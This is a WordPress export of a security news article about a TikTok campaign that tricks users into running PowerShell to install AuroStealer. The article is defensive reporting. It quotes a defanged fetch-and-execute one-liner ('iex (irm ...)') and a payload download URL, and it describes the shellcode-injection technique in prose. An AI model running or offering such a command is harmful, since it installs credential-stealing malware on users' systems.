{"id":7767,"date":"2025-10-18T10:04:05","date_gmt":"2025-10-18T10:04:05","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/10\/18\/hackers-using-tiktok-videos-to-deploy-self-compiling-malware-that-leverages-powershell-for-execution\/"},"modified":"2025-10-18T10:04:05","modified_gmt":"2025-10-18T10:04:05","slug":"hackers-using-tiktok-videos-to-deploy-self-compiling-malware-that-leverages-powershell-for-execution","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/10\/18\/hackers-using-tiktok-videos-to-deploy-self-compiling-malware-that-leverages-powershell-for-execution\/","title":{"rendered":"Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution"},"content":{"rendered":"<p>    Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Cybercriminals are exploiting TikTok\u2019s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead.<\/p>\n<p>The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell commands on their systems.<\/p>\n<p>Victims encounter TikTok videos offering free activation of popular software like <a href=\"https:\/\/cybersecuritynews.com\/adobe-photoshop-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">Photoshop<\/a>, with one such video accumulating over 500 likes before detection.<\/p>\n<p>The attack chain begins when users follow instructions to open PowerShell with administrator privileges and execute a deceptively simple one-liner command.<\/p>\n<p>The initial infection vector instructs victims to run the command <code>iex (irm slmgr[.]win\/photoshop)<\/code>, which fetches and executes malicious <a href=\"https:\/\/cybersecuritynews.com\/microsoft-removes-powershell-2-0-from-windows\/\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell code<\/a> from a remote server.<\/p>\n<p>This first-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection rate of 17\/63, demonstrating its evasive capabilities.<\/p>\n<p>The script downloads a secondary executable called updater.exe from hxxps:\/\/file-epq[.]pages[.]dev\/updater.exe, which analysis revealed as AuroStealer malware designed to harvest sensitive credentials and system information.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgc_mqP8IozQqX3oFgcqyJ60N2VspFUraHv8Ja9IEkwo3P-6WhLyT4ySpoLp6Aecc1p1XDY5qOgKylt8xdA5XcR2csJcT0Nr863iTK5Ok40lcSbR4wGDfVlT1RxNrVdEJXfRUoOvsZ-R-xnybUiSX7F5Tf8zibksv6xIrIB1Pdh-6rm69_G2gt8PzIyZvo\/s16000\/Fake%2520TikTok%2520video%2520%28Source%2520-%2520Internet%2520Storm%2520Center%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Fake TikTok video (Source \u2013 Internet Storm Center)<\/figcaption><\/figure>\n<\/div>\n<p>Internet Storm Center researchers <a href=\"https:\/\/isc.sans.edu\/diary\/32380\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> the campaign and discovered that persistence mechanisms are implemented through scheduled tasks disguised as legitimate system processes.<\/p>\n<p>The malware randomly selects task names such as \u201cMicrosoftEdgeUpdateTaskMachineCore\u201d to blend in with genuine Windows services, ensuring execution at every user logon.<\/p>\n<p>A third payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces an advanced evasion technique by compiling C# code on-demand during runtime using the .NET Framework compiler located at <code>C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe<\/code>.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-self-compiling-technique-and-memory-injection\"><strong>Self-Compiling Technique and Memory Injection<\/strong><\/h2>\n<p>The self-compiling capability represents a sophisticated approach to evade traditional <a href=\"https:\/\/cybersecuritynews.com\/real-time-endpoint-threat-detection\/\" target=\"_blank\" rel=\"noreferrer noopener\">detection mechanisms<\/a>.<\/p>\n<p>The <a href=\"https:\/\/cybersecuritynews.com\/chatgpt-powered-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">malware<\/a> compiles a C# class during execution that imports kernel32.dll functions including VirtualAlloc, CreateThread, and WaitForSingleObject.<\/p>\n<p>This dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing additional files to disk.<\/p>\n<p>Researchers discovered multiple variations of this campaign across TikTok targeting users searching for cracked versions of various software applications, highlighting the importance of avoiding untrusted sources for software downloads.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google<\/a>.<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/hackers-using-tiktok-videos-to-deploy-self-compiling-malware\/\">Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/hackers-using-tiktok-videos-to-deploy-self-compiling-malware\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution Cybercriminals are exploiting TikTok\u2019s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead. The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-7767","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7767"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7767"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7767\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}